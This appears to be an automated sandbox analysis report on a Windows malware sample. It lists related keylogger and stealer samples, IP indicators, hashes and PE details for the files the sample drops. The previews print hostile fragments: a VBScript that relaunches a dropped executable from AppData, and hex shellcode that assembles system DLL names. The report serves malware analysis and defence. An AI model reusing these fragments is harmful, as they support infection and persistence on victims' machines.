                                                        • 104.26.13.205
                                                        https://www.canva.com/design/DAFgnbl60Ls/hLJisMAwxDjPFHzhh8Zhhw/view?utm_content=DAFgnbl60Ls&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousUnknownBrowse
                                                        • 104.16.103.112
                                                        glU9DsYtYY.exeGet hashmaliciousDridex Dropper, RisePro StealerBrowse
                                                        • 104.26.5.15
                                                        http://midjourney.coGet hashmaliciousUnknownBrowse
                                                        • 104.17.2.184
                                                        58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.169.18
                                                        DHL 986022_pdf.vbsGet hashmaliciousFormBookBrowse
                                                        • 172.67.215.45
                                                        EUR 17252,8 20240403.vbsGet hashmaliciousRemcosBrowse
                                                        • 172.67.215.45
                                                        UPS 984645.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        54328bd36c14bd82ddaa0c04b25ed9ad58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        VI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                        • 172.67.177.134
                                                        Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        file.exeGet hashmaliciousSmokeLoader, Xehook StealerBrowse
                                                        • 172.67.177.134
                                                        request-2.doc.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                        • 172.67.177.134
                                                        https://my.visme.co/view/w46vn911-northshore-tractor-ltdGet hashmaliciousUnknownBrowse
                                                        • 172.67.177.134
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 172.67.177.134
                                                        3b5074b1b5d032e5620f69f9f700ff0eTbwzlHMTM0.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.27.85
                                                        Gh9nbkn2Q6.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.27.85
                                                        TbwzlHMTM0.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.27.85
                                                        4N8BNeFRkZ.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.27.85
                                                        https://wix-l.in/k-F53x0v7FGet hashmaliciousUnknownBrowse
                                                        • 104.21.27.85
                                                        Lebenslauf Till Martin B#U00e4hringer.docx - Google Docs(1).htmGet hashmaliciousUnknownBrowse
                                                        • 104.21.27.85
                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.21.27.85
                                                        shipping documents.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 104.21.27.85
                                                        58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.27.85
                                                        DHL 986022_pdf.vbsGet hashmaliciousFormBookBrowse
                                                        • 104.21.27.85
                                                        No context
                                                        Process:C:\Users\user\Desktop\PsBygexGwH.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):104292
                                                        Entropy (8bit):7.941208599431399
                                                        Encrypted:false
                                                        SSDEEP:3072:9Sfybq8aByxl/fO6XV7VmuD/3QcfaiSebeefOgwpN:9H9EEl/fH/gKaiRbbfKpN
                                                        MD5:814097FD9BBB82AAD3FDE173805F64BD
                                                        SHA1:45B4AB185ACE33B687C48082617F0E1CD89EA2A6
                                                        SHA-256:1ECC36DB3051954AD5D96501C004AA6560D0B5FDF3F7420BADE23C632774F6BF
                                                        SHA-512:CA8B68FDC1D1FD0D6A4393EC96C7BF7B1DBC446E336CC260AE9C1122C8F94D1180AAEA7636BB2C4E8581EB868F82C30C523AF1CA84BCA95ABFE79D4A6F8F9FE3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:EA06.......3j]Z.D..jt.o..8..g...f.K.U&.*U2s9.R..J...R.V..p.....q...)........ox.47....gs...-...H..o/.M..9\.)(..l5...;..^'5.4..4.O-....\kS.].w1.Tqr..|.z....X...:i.jqS.t.V.V.P.@..Z..tFi5;H..:..g..9..WjCF..j ....=..J.X.I..YL.F.t.../.J,...:m.J......B..../..E..T. ..kQJ....u.$.A.....]".I....:..cW.W.l4J..;.. ...B.tZ.UI.@.t....>...c...%.I.V.J...1j...K..'......9..W|.z.....W'sjm[;d.Rt{....:jf5Z...Y.c...@..ti:i.'..I.....Sgs..:.I.:...........tG...`..w..$.....\....@.r...D@..0..Z.t'.....c.U&...s;.Zj..uf..\&........4..{m@.S'...".K.V.5:l.#Z.Sx D.vCm.U'.*}2s=.D..-.>.S..kv9...8.j.J]b...R.....\......2.N+..........RsQ..f.....S..5).jd..F.u..<.\.Z&R...}..sz.&.0..-.:4..Y.X+.....Gi....."^f..5...../..5.mB.Y.18....X.v;.*.8..bs......&.k.*'[.N...$..<......8..`.*]z...R.Q..B...Vi5.}..Z.[.s..~.P.Im...:{D.R*.[t>.Q.[&...8........6.R..y.z..~\...(....Pg.[...I.Pd.*U:w:......n......6.:..).*]j.5...2..@.T.P.....I.^K..Z...`/$N!H.P.2......N...X.Cm........T.r.4.........`../..T...9j.::
                                                        Process:C:\Users\user\Desktop\PsBygexGwH.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):10102
                                                        Entropy (8bit):7.593118334351576
                                                        Encrypted:false
                                                        SSDEEP:192:QNAVE5Le06Tr+mPg5aV719N2wkCKltkRcLihNLpxJFdu63kKxvD/MIFnY7N:QNAQe06f+mBV71ewkRnihhJX0KxBFnGN
                                                        MD5:F7F3CDD23C6186501A42F72D606BC7AC
                                                        SHA1:7764AB12BFC2A588BECC07D9D24B020F36E7568C
                                                        SHA-256:16CCD30B291DA4E7DB7EFFFE3781896E9C028456531D9CD24C824998155861B6
                                                        SHA-512:A4B1495081555E702B015F3D436EFC494E475A8B39CB38285656A4B939075F9FA5553BD08DBF0F051D7CC4112DA08779E77352F21ACB35CA0643425E2B40ACA9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:EA06..t..Nh3*,.5......7..&TY..k5.X..9...c....)...5.Mf.)......&.i..s4..&.)..j.%. ..a......N...(...a.6.,v+....m.YlS........s3.Z...9.X.3 ...f....a4.6.&.........6|s...gc.0....T...4.Y..`...k....l.1../.q5.N..2....$......x. ..$h.3.....#`...Mf...L.d.!...Mf.....' .Y...n.....0.N&.....d.U..&.<...l.U..'.5_....U..,`5_....U..f.5_..d.U.(..1......V...Nf.`..N&.`..M.^....j.7..$zn.....r..... !..Y&.G[....A6...f../.n.u.M.`>_L........)@...[..a6...z.2.... =........K<.l...$..6.{......0......r|3K%....L.6>....4...l......_......4|.+(.7.c...|3K%.d....f.9....c..i|v0F...a.l.,`.\..lsy...4.Y.o...mc..,s.$.k3.....f...`.....fcb..l.i....l..np..Y.....M..14.X@..4.......7d.N..;c...,.8.'.!....@!....f .....0.......Brb.....f.)...b..@!...g,. ....36.M&V`.......vd.....l3.,...B.B3p.N...;3.X..Q7...&..8.....f`...M.'I...x..C.....,vh...4.c9.L..@....`...g.,58..,.+..E3.....c.P..Y,3.....`Nf...N.@.;5.X.c9.w.!....f......n...X@A.$...`...g..38.X..I..(...Xl.b.,...#V9..s9..@!...Gf.....,fac.Y' !@.#5.....c........$....~
                                                        Process:C:\Users\user\AppData\Local\directory\name.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):104292
                                                        Entropy (8bit):7.941208599431399
                                                        Encrypted:false
                                                        SSDEEP:3072:9Sfybq8aByxl/fO6XV7VmuD/3QcfaiSebeefOgwpN:9H9EEl/fH/gKaiRbbfKpN
                                                        MD5:814097FD9BBB82AAD3FDE173805F64BD
                                                        SHA1:45B4AB185ACE33B687C48082617F0E1CD89EA2A6
                                                        SHA-256:1ECC36DB3051954AD5D96501C004AA6560D0B5FDF3F7420BADE23C632774F6BF
                                                        SHA-512:CA8B68FDC1D1FD0D6A4393EC96C7BF7B1DBC446E336CC260AE9C1122C8F94D1180AAEA7636BB2C4E8581EB868F82C30C523AF1CA84BCA95ABFE79D4A6F8F9FE3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:EA06.......3j]Z.D..jt.o..8..g...f.K.U&.*U2s9.R..J...R.V..p.....q...)........ox.47....gs...-...H..o/.M..9\.)(..l5...;..^'5.4..4.O-....\kS.].w1.Tqr..|.z....X...:i.jqS.t.V.V.P.@..Z..tFi5;H..:..g..9..WjCF..j ....=..J.X.I..YL.F.t.../.J,...:m.J......B..../..E..T. ..kQJ....u.$.A.....]".I....:..cW.W.l4J..;.. ...B.tZ.UI.@.t....>...c...%.I.V.J...1j...K..'......9..W|.z.....W'sjm[;d.Rt{....:jf5Z...Y.c...@..ti:i.'..I.....Sgs..:.I.:...........tG...`..w..$.....\....@.r...D@..0..Z.t'.....c.U&...s;.Zj..uf..\&........4..{m@.S'...".K.V.5:l.#Z.Sx D.vCm.U'.*}2s=.D..-.>.S..kv9...8.j.J]b...R.....\......2.N+..........RsQ..f.....S..5).jd..F.u..<.\.Z&R...}..sz.&.0..-.:4..Y.X+.....Gi....."^f..5...../..5.mB.Y.18....X.v;.*.8..bs......&.k.*'[.N...$..<......8..`.*]z...R.Q..B...Vi5.}..Z.[.s..~.P.Im...:{D.R*.[t>.Q.[&...8........6.R..y.z..~\...(....Pg.[...I.Pd.*U:w:......n......6.:..).*]j.5...2..@.T.P.....I.^K..Z...`/$N!H.P.2......N...X.Cm........T.r.4.........`../..T...9j.::
                                                        Process:C:\Users\user\AppData\Local\directory\name.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):10102
                                                        Entropy (8bit):7.593118334351576
                                                        Encrypted:false
                                                        SSDEEP:192:QNAVE5Le06Tr+mPg5aV719N2wkCKltkRcLihNLpxJFdu63kKxvD/MIFnY7N:QNAQe06f+mBV71ewkRnihhJX0KxBFnGN
                                                        MD5:F7F3CDD23C6186501A42F72D606BC7AC
                                                        SHA1:7764AB12BFC2A588BECC07D9D24B020F36E7568C
                                                        SHA-256:16CCD30B291DA4E7DB7EFFFE3781896E9C028456531D9CD24C824998155861B6
                                                        SHA-512:A4B1495081555E702B015F3D436EFC494E475A8B39CB38285656A4B939075F9FA5553BD08DBF0F051D7CC4112DA08779E77352F21ACB35CA0643425E2B40ACA9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:EA06..t..Nh3*,.5......7..&TY..k5.X..9...c....)...5.Mf.)......&.i..s4..&.)..j.%. ..a......N...(...a.6.,v+....m.YlS........s3.Z...9.X.3 ...f....a4.6.&.........6|s...gc.0....T...4.Y..`...k....l.1../.q5.N..2....$......x. ..$h.3.....#`...Mf...L.d.!...Mf.....' .Y...n.....0.N&.....d.U..&.<...l.U..'.5_....U..,`5_....U..f.5_..d.U.(..1......V...Nf.`..N&.`..M.^....j.7..$zn.....r..... !..Y&.G[....A6...f../.n.u.M.`>_L........)@...[..a6...z.2.... =........K<.l...$..6.{......0......r|3K%....L.6>....4...l......_......4|.+(.7.c...|3K%.d....f.9....c..i|v0F...a.l.,`.\..lsy...4.Y.o...mc..,s.$.k3.....f...`.....fcb..l.i....l..np..Y.....M..14.X@..4.......7d.N..;c...,.8.'.!....@!....f .....0.......Brb.....f.)...b..@!...g,. ....36.M&V`.......vd.....l3.,...B.B3p.N...;3.X..Q7...&..8.....f`...M.'I...x..C.....,vh...4.c9.L..@....`...g.,58..,.+..E3.....c.P..Y,3.....`Nf...N.@.;5.X.c9.w.!....f......n...X@A.$...`...g..38.X..I..(...Xl.b.,...#V9..s9..@!...Gf.....,fac.Y' !@.#5.....c........$....~
                                                        Process:C:\Users\user\AppData\Local\directory\name.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):104292
                                                        Entropy (8bit):7.941208599431399
                                                        Encrypted:false
                                                        SSDEEP:3072:9Sfybq8aByxl/fO6XV7VmuD/3QcfaiSebeefOgwpN:9H9EEl/fH/gKaiRbbfKpN
                                                        MD5:814097FD9BBB82AAD3FDE173805F64BD
                                                        SHA1:45B4AB185ACE33B687C48082617F0E1CD89EA2A6
                                                        SHA-256:1ECC36DB3051954AD5D96501C004AA6560D0B5FDF3F7420BADE23C632774F6BF
                                                        SHA-512:CA8B68FDC1D1FD0D6A4393EC96C7BF7B1DBC446E336CC260AE9C1122C8F94D1180AAEA7636BB2C4E8581EB868F82C30C523AF1CA84BCA95ABFE79D4A6F8F9FE3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:EA06.......3j]Z.D..jt.o..8..g...f.K.U&.*U2s9.R..J...R.V..p.....q...)........ox.47....gs...-...H..o/.M..9\.)(..l5...;..^'5.4..4.O-....\kS.].w1.Tqr..|.z....X...:i.jqS.t.V.V.P.@..Z..tFi5;H..:..g..9..WjCF..j ....=..J.X.I..YL.F.t.../.J,...:m.J......B..../..E..T. ..kQJ....u.$.A.....]".I....:..cW.W.l4J..;.. ...B.tZ.UI.@.t....>...c...%.I.V.J...1j...K..'......9..W|.z.....W'sjm[;d.Rt{....:jf5Z...Y.c...@..ti:i.'..I.....Sgs..:.I.:...........tG...`..w..$.....\....@.r...D@..0..Z.t'.....c.U&...s;.Zj..uf..\&........4..{m@.S'...".K.V.5:l.#Z.Sx D.vCm.U'.*}2s=.D..-.>.S..kv9...8.j.J]b...R.....\......2.N+..........RsQ..f.....S..5).jd..F.u..<.\.Z&R...}..sz.&.0..-.:4..Y.X+.....Gi....."^f..5...../..5.mB.Y.18....X.v;.*.8..bs......&.k.*'[.N...$..<......8..`.*]z...R.Q..B...Vi5.}..Z.[.s..~.P.Im...:{D.R*.[t>.Q.[&...8........6.R..y.z..~\...(....Pg.[...I.Pd.*U:w:......n......6.:..).*]j.5...2..@.T.P.....I.^K..Z...`/$N!H.P.2......N...X.Cm........T.r.4.........`../..T...9j.::
                                                        Process:C:\Users\user\AppData\Local\directory\name.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):10102
                                                        Entropy (8bit):7.593118334351576
                                                        Encrypted:false
                                                        SSDEEP:192:QNAVE5Le06Tr+mPg5aV719N2wkCKltkRcLihNLpxJFdu63kKxvD/MIFnY7N:QNAQe06f+mBV71ewkRnihhJX0KxBFnGN
                                                        MD5:F7F3CDD23C6186501A42F72D606BC7AC
                                                        SHA1:7764AB12BFC2A588BECC07D9D24B020F36E7568C
                                                        SHA-256:16CCD30B291DA4E7DB7EFFFE3781896E9C028456531D9CD24C824998155861B6
                                                        SHA-512:A4B1495081555E702B015F3D436EFC494E475A8B39CB38285656A4B939075F9FA5553BD08DBF0F051D7CC4112DA08779E77352F21ACB35CA0643425E2B40ACA9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:EA06..t..Nh3*,.5......7..&TY..k5.X..9...c....)...5.Mf.)......&.i..s4..&.)..j.%. ..a......N...(...a.6.,v+....m.YlS........s3.Z...9.X.3 ...f....a4.6.&.........6|s...gc.0....T...4.Y..`...k....l.1../.q5.N..2....$......x. ..$h.3.....#`...Mf...L.d.!...Mf.....' .Y...n.....0.N&.....d.U..&.<...l.U..'.5_....U..,`5_....U..f.5_..d.U.(..1......V...Nf.`..N&.`..M.^....j.7..$zn.....r..... !..Y&.G[....A6...f../.n.u.M.`>_L........)@...[..a6...z.2.... =........K<.l...$..6.{......0......r|3K%....L.6>....4...l......_......4|.+(.7.c...|3K%.d....f.9....c..i|v0F...a.l.,`.\..lsy...4.Y.o...mc..,s.$.k3.....f...`.....fcb..l.i....l..np..Y.....M..14.X@..4.......7d.N..;c...,.8.'.!....@!....f .....0.......Brb.....f.)...b..@!...g,. ....36.M&V`.......vd.....l3.,...B.B3p.N...;3.X..Q7...&..8.....f`...M.'I...x..C.....,vh...4.c9.L..@....`...g.,58..,.+..E3.....c.P..Y,3.....`Nf...N.@.;5.X.c9.w.!....f......n...X@A.$...`...g..38.X..I..(...Xl.b.,...#V9..s9..@!...Gf.....,fac.Y' !@.#5.....c........$....~
                                                        Process:C:\Users\user\Desktop\PsBygexGwH.exe
                                                        File Type:ASCII text, with very long lines (29718), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):29718
                                                        Entropy (8bit):3.579534381329983
                                                        Encrypted:false
                                                        SSDEEP:768:FiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbeE+ItIiy4vfF3if6gy8:FiTZ+2QoioGRk6ZklputwjpjBkCiw2R2
                                                        MD5:4F75A7B10B7338B674939F2E64A4F73A
                                                        SHA1:F5DA2453CB0C24182783E638AF61E4D98B072AC9
                                                        SHA-256:7860BD51138552E6A637DB7B9C3998A865CE586F7DD0DCDD0D5643D62699B9BA
                                                        SHA-512:0679F8CBF17E5986B4EAB246B5AEA68C2C80F08EB02F2103675BC2BBD2FB57E6199FCEB89BDF984D379CDD4BF77231B4F62D99EE888CC4F18E4F4F4A7FC5F61D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:D9A2E7D5A75A08C7E82E0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000006689857effffff33c966894d80ba
                                                        Process:C:\Users\user\Desktop\PsBygexGwH.exe
                                                        File Type:MIPSEB MIPS-II ECOFF executable not stripped - version 82.75
                                                        Category:dropped
                                                        Size (bytes):133632
                                                        Entropy (8bit):7.068705738050652
                                                        Encrypted:false
                                                        SSDEEP:3072:kdmkY26vGslIQ+wteQUBDe1uxH5CUkO3ZwS8O64zLhJ0rDW0w654ArA:kgkY9+qBUgkV34O64X/0rD5A
                                                        MD5:AB789573C51720A521954BC2DEEA06FC
                                                        SHA1:AF07C939088FFEB71E7C16A4D7487EE7931E0006
                                                        SHA-256:C70A64AC25B90077931E151724F8566C8D07E6E4888AAD9577FA467ED96A97B8
                                                        SHA-512:0B460881D64A03DC82DF6C0D3D4D0619DABB171B24866D460FA4F1AC3A84F95F8115667093D51F0C65C835802E6418359DAFF81C934E8FEB425CC3934FDC961A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                        Reputation:low
                                                        Preview:.c.6KVAD]ISI..Z8.A81UYRK.T6BJL996HVADYISIR4Z8GA81UYRKXT6BJL9.6HVO[.GS.[.{.F....1;8x$D-->XT.+7/*6=s+7.(M)aQ_u...x9Y&/b44<lVADYISI.qZ8.@;16Q..XT6BJL99.HT@OX.SI.5Z8SA81UYRUJV6BjL99.JVAD.ISiR4Z:GA<1UYRKXT2BJL996HV!FYIQIR4Z8GC8q.YR[XT&BJL9)6HFADYISIB4Z8GA81UYRK.E4B.L996hTA.IISIR4Z8GA81UYRKXT6B.N956HVADYISIR4Z8GA81UYRKXT6BJL996HVADYISIR4Z8GA81UYRKXT.BJD996HVADYISIZ.Z8.A81UYRKXT6Bd8\ABHVA`.HSIr4Z8.@81WYRKXT6BJL996HVaDY)};!F98GA.!UYRkZT6PJL9.7HVADYISIR4Z8G.81.w .4;UBJ@996H.CDYKSIR<X8GA81UYRKXT6B.L9{6HVADYISIR4Z8GA81G[RKXT6.JL9;6MV.dXI..R4Y8GA.1U_vkYT.BJL996HVADYISIR4Z8GA81UYRKXT6BJL996HVADYISI.I.7...X&..KXT6BJM;:2N^IDYISIR4ZFGA8wUYR.XT6uJL9.6HV,DYIwIR4$8GAF1UY6KXTDBJLX96H.ADY&SIRZZ8G?81UGPcxT6H`j9;.iVANYc.:p4Z2.@81Q*qKX^.@JL=J.HVK.ZISM!.Z8M.<1U]!mXT<.OL9=..VB.OOSII[c8GK82.LTKXO.dJN..6H\An.IP.G2Z8\k.1W.[KXP..9Q990`.ADS=ZIR6.2GA<.K[z.XT<hh2+96L}An{7@IR0q8mcF%UYV`X~.<_L9=.H|c:OISMy4p&E..1U]xi&C6BNg9..6NAD]bScpJC8GE.1.GP.AT6F`J.[6:n]D)J<.R4\..A8;}.RK^T.xJ2.96LT..YIYoxjZ:oK91_YPH%o6BNN=D.HVEn.IQ2l4
                                                        Process:C:\Users\user\Desktop\PsBygexGwH.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):114376704
                                                        Entropy (8bit):7.999599217476744
                                                        Encrypted:true
                                                        SSDEEP:393216:I3dR6pAWZcZPnwVif1Obttb5MK356rrQ42LEGrzEj5JHfY/q5KQf5NHAB1xLq:IUpAWpM1M356rrQ4LVfYr0HW/G
                                                        MD5:90D7DF3194AF25C7942DCDB56E8902F3
                                                        SHA1:2865B48E868C6CC67B335E82F3EF2864D727F6A3
                                                        SHA-256:496E83A0C5C3A23F63CF1B3EEC90E671E83C1186E9FA64A36429EABC2243367C
                                                        SHA-512:F4E95549954E921498656661C5049DC6ADB7BAFA82D8C198059E95F0F264B0A4DF49BA6CD79E223F043DDA0AFC03650ACE78A3B14AB965B0EFE637CA5CDA719F
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        Reputation:low
                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L......f..........".................w.............@.......................................@...@.......@.....................d...|....@..x.................... ...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...x....@......................@..@.reloc...u... ...v..................@..B........................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\AppData\Local\directory\name.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):268
                                                        Entropy (8bit):3.4209455304240626
                                                        Encrypted:false
                                                        SSDEEP:6:DMM8lfm3OOQdUfcloRKUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNloRKQ1A1z4mA2n
                                                        MD5:D3A871A22DFC23DD6763F6002299B13A
                                                        SHA1:B7934BFD389FE7FBDC08710EDABA4C16D3EED618
                                                        SHA-256:FEA868420602CDAF96C19BE169F6BA44178494DB3B8F6292DCD7B8A8BB194F66
                                                        SHA-512:6166B8A0DED88F7C8F3CC1D92A44A0A112B4CFCBEEB3934005E89B32614C79BB7F7ABDBF8CF84D90D4864C425460673739935562B344AE14FFE1076F5D0F7CA9
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.985470169110912
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:PsBygexGwH.exe
                                                        File size:1'130'496 bytes
                                                        MD5:222d05295014f8974d6e358e1507770e
                                                        SHA1:d1475a87d8aad1852eda1ac93ebb0bbbb1f08e0b
                                                        SHA256:f36cebf205cb95b23bea11f15356461b51b40cd0bd586e5c5f151a6396a6151a
                                                        SHA512:c4c7306b63d8532337a302ae1129d10bea3fe31c5ac38f2d279309960b6c2bbd3b572486778a6d00e75bdcf3ccb92d975ead94f9c5134d712222ee99da3bd096
                                                        SSDEEP:24576:gqDEvCTbMWu7rQYlBQcBiT6rprG8anIpGboB/Gii:gTvC/MTQYxsWR7anCGw+i
                                                        TLSH:F735BF0273C1D062FF9B92334B5AF6515BBC6A260123E61F13981DB9BE701B1563E7A3
                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                        Icon Hash:aaf3e3e3938382a0
                                                        Entrypoint:0x420577
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6602E50B [Tue Mar 26 15:08:59 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:5
                                                        OS Version Minor:1
                                                        File Version Major:5
                                                        File Version Minor:1
                                                        Subsystem Version Major:5
                                                        Subsystem Version Minor:1
                                                        Import Hash:948cc502fe9226992dce9417f952fce3
                                                        Instruction
                                                        call 00007F3E0D724223h
                                                        jmp 00007F3E0D723B2Fh
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007F3E0D723D0Dh
                                                        mov dword ptr [esi], 0049FDF0h
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 0049FDF8h
                                                        mov dword ptr [ecx], 0049FDF0h
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        push dword ptr [ebp+08h]
                                                        mov esi, ecx
                                                        call 00007F3E0D723CDAh
                                                        mov dword ptr [esi], 0049FE0Ch
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        and dword ptr [ecx+04h], 00000000h
                                                        mov eax, ecx
                                                        and dword ptr [ecx+08h], 00000000h
                                                        mov dword ptr [ecx+04h], 0049FE14h
                                                        mov dword ptr [ecx], 0049FE0Ch
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 0049FDD0h
                                                        and dword ptr [eax], 00000000h
                                                        and dword ptr [eax+04h], 00000000h
                                                        push eax
                                                        mov eax, dword ptr [ebp+08h]
                                                        add eax, 04h
                                                        push eax
                                                        call 00007F3E0D7268CDh
                                                        pop ecx
                                                        pop ecx
                                                        mov eax, esi
                                                        pop esi
                                                        pop ebp
                                                        retn 0004h
                                                        lea eax, dword ptr [ecx+04h]
                                                        mov dword ptr [ecx], 0049FDD0h
                                                        push eax
                                                        call 00007F3E0D726918h
                                                        pop ecx
                                                        ret
                                                        push ebp
                                                        mov ebp, esp
                                                        push esi
                                                        mov esi, ecx
                                                        lea eax, dword ptr [esi+04h]
                                                        mov dword ptr [esi], 0049FDD0h
                                                        push eax
                                                        call 00007F3E0D726901h
                                                        test byte ptr [ebp+08h], 00000001h
                                                        pop ecx
                                                        Programming Language:
                                                        • [ C ] VS2008 SP1 build 30729
                                                        • [IMP] VS2008 SP1 build 30729
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x3d478.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1120000x7594.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
